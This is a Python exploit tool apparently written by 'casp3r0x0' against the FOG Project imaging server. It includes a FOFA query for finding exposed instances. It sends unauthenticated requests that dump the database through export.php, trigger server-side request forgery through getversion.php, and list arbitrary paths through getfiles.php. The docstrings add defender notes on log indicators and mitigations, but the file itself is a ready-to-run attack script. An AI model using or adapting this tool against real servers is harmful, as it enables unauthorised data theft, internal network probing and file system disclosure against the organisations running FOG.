import requests
import argparse
import sys
from urllib.parse import quote
# FOFA search icon_hash="-1952619005"
def print_cred():
    """Print the two-line author banner to stdout."""
    banner_lines = (
        "[*] Fog project exploit by casp3r0x0 hassan al-khafaji",
        "[*] GitHub: https://github.com/casp3r0x0",
    )
    for banner_line in banner_lines:
        print(banner_line)
def EXPDump(target):
    """POST a report-export request to the FOG web UI and save the reply.

    One POST goes to ``/fog/management/export.php?filename=HistoryReport&type=pdf``
    with an empty ``PHPSESSID`` cookie and empty ``fogguiuser``/``fogguipass``
    form fields, so no valid credentials accompany the request. The response
    body is written to ``output.txt`` in the current working directory,
    replacing any existing file of that name.

    Args:
        target: Base URL of the FOG server; the endpoint path is appended
            to it as-is.

    Raises:
        requests.HTTPError: Raised by ``raise_for_status()`` when the server
            answers with a 4xx/5xx status.

    Defender notes:
        In access logs this appears as a POST to
        ``/fog/management/export.php`` without a valid session. A 2xx answer
        to such a request indicates the export endpoint responds to callers
        that never logged in. Keep the management UI off untrusted networks
        and run a FOG release in which this endpoint enforces authentication
        (this page names no fixed version).
    """
    print(f"[+] Target: {target}")
    print("[+] Dumping...")

    endpoint = f"{target}/fog/management/export.php?filename=HistoryReport&type=pdf"

    # Empty session id: the request carries no authenticated session.
    session_cookie = {"PHPSESSID": ""}

    # Header set replayed verbatim from a captured browser request. Origin and
    # Referer stay fixed at http://192.168.43.133 whatever `target` is, so an
    # Origin/Referer that does not match the Host header is a usable log/WAF
    # indicator for this script.
    request_headers = {
        "X-Requested-With": "XMLHttpRequest",
        "Accept-Language": "en-US,en;q=0.9",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36",
        "Origin": "http://192.168.43.133",
        "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }

    # Login fields are sent empty; `nojson` and `export` are passed through
    # as captured (their server-side meaning is not visible from this file).
    form_fields = {"fogguiuser": '', "fogguipass": '', "nojson": "4", "export": "3"}

    # verify=False turns off TLS certificate validation; no timeout is set,
    # so the call can block for as long as the server keeps the socket open.
    response = requests.post(
        endpoint,
        headers=request_headers,
        cookies=session_cookie,
        data=form_fields,
        verify=False,
    )
    response.raise_for_status()

    with open("output.txt", "w", encoding="utf-8") as out_file:
        out_file.write(response.text)
    print("[+] Dumped saved to output.txt")
def SSRF(target, url):
    """Send a GET to ``getversion.php`` with a caller-chosen ``url`` parameter.

    The request goes to ``/fog/service/getversion.php?url=<url>`` with ``url``
    percent-encoded by ``urllib.parse.quote``. The cookie is an empty
    ``PHPSESSID``, so no authenticated session is presented. Only the HTTP
    status is checked; the response body is neither printed nor stored.

    Args:
        target: Base URL of the FOG server; the endpoint path is appended
            to it as-is.
        url: Value placed in the ``url`` query parameter. The script's author
            labels this SSRF, i.e. the server is presumably expected to fetch
            this address itself (server-side behaviour is not visible here).

    Raises:
        requests.HTTPError: Raised by ``raise_for_status()`` on a 4xx/5xx
            status.

    Defender notes:
        Log and alert on requests to ``/fog/service/getversion.php`` whose
        ``url`` parameter is not the expected version-check address, and
        restrict outbound connections from the FOG host so it cannot reach
        internal-only services.
    """
    print(f"[+] Target: {target}")
    print(f"[+] SSRF URL: {url}")

    encoded_url = quote(url)
    endpoint = f"{target}/fog/service/getversion.php?url={encoded_url}"

    # Empty session id: the request carries no authenticated session.
    session_cookie = {"PHPSESSID": ""}

    # Header set replayed verbatim from a captured browser request. Origin and
    # Referer stay fixed at http://192.168.43.133 whatever `target` is, which
    # makes a Host/Origin mismatch a usable detection indicator.
    request_headers = {
        "X-Requested-With": "XMLHttpRequest",
        "Accept-Language": "en-US,en;q=0.9",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36",
        "Origin": "http://192.168.43.133",
        "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }

    # verify=False turns off TLS certificate validation; no timeout is set.
    response = requests.get(
        endpoint,
        headers=request_headers,
        cookies=session_cookie,
        verify=False,
    )
    response.raise_for_status()
    print("[+] SSRF request sent")
def listfiles(target, path):
    """Send a GET to ``getfiles.php`` for ``path`` and print the response body.

    The request goes to ``/fog/status/getfiles.php?path=<path>`` with an empty
    ``PHPSESSID`` cookie, so no authenticated session is presented. The raw
    response text is echoed to stdout.

    Args:
        target: Base URL of the FOG server; the endpoint path is appended
            to it as-is.
        path: Value placed in the ``path`` query parameter.

    Raises:
        requests.HTTPError: Raised by ``raise_for_status()`` on a 4xx/5xx
            status.

    Defender notes:
        Review access logs for ``/fog/status/getfiles.php`` requests that
        arrive without a valid session or whose ``path`` points outside the
        directories FOG is expected to serve. A 2xx answer to such a request
        indicates the endpoint responds to callers that never logged in.
    """
    print(f"[+] Target: {target}")
    print(f"[+] Path: {path}")

    endpoint = f"{target}/fog/status/getfiles.php?path={path}"

    # Empty session id: the request carries no authenticated session.
    session_cookie = {"PHPSESSID": ""}

    # Header set replayed verbatim from a captured browser request. Origin and
    # Referer stay fixed at http://192.168.43.133 whatever `target` is, which
    # makes a Host/Origin mismatch a usable detection indicator.
    request_headers = {
        "X-Requested-With": "XMLHttpRequest",
        "Accept-Language": "en-US,en;q=0.9",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36",
        "Origin": "http://192.168.43.133",
        "Referer": "http://192.168.43.133/fog/management/index.php?node=report&sub=file&f=aGlzdG9yeSByZXBvcnQ%3D",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
    }

    # verify=False turns off TLS certificate validation; no timeout is set.
    response = requests.get(
        endpoint,
        headers=request_headers,
        cookies=session_cookie,
        verify=False,
    )
    response.raise_for_status()
    print("[+] List files request sent")
    print(response.text)
def main():
    """Parse the command line and run each requested action in a fixed order.

    ``-t/--target`` is mandatory. At least one of ``--dump``, ``--SSRF URL``
    or ``--listfiles PATH`` must be given; otherwise an error and the help
    text are printed and the process exits with status 1. When several
    actions are requested they run in the order dump, SSRF, listfiles, and
    the author banner is printed before each one.
    """
    cli = argparse.ArgumentParser(description="Exploit tool for FOGProject system by Casp3r0x0 Hassan Ali Al-khafaji")
    cli.add_argument("-t", "--target", required=True, help="Target URL (mandatory)")
    cli.add_argument("--dump", action="store_true", help="dump full db from the target")
    cli.add_argument("--SSRF", metavar="URL", help="Execute SSRF function with specified URL")
    cli.add_argument("--listfiles", metavar="PATH", help="Execute listfiles function with specified path")
    opts = cli.parse_args()

    # Refuse to run when no action flag was supplied.
    if not (opts.dump or opts.SSRF or opts.listfiles):
        print("Error: At least one action must be specified (--dump, --SSRF, or --listfiles)")
        cli.print_help()
        sys.exit(1)

    base_url = opts.target

    # (flag value, action) pairs, kept in the order the actions are run.
    requested_actions = (
        (opts.dump, lambda: EXPDump(base_url)),
        (opts.SSRF, lambda: SSRF(base_url, opts.SSRF)),
        (opts.listfiles, lambda: listfiles(base_url, opts.listfiles)),
    )
    for flag_value, run_action in requested_actions:
        if flag_value:
            print_cred()
            run_action()
# Run the CLI only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()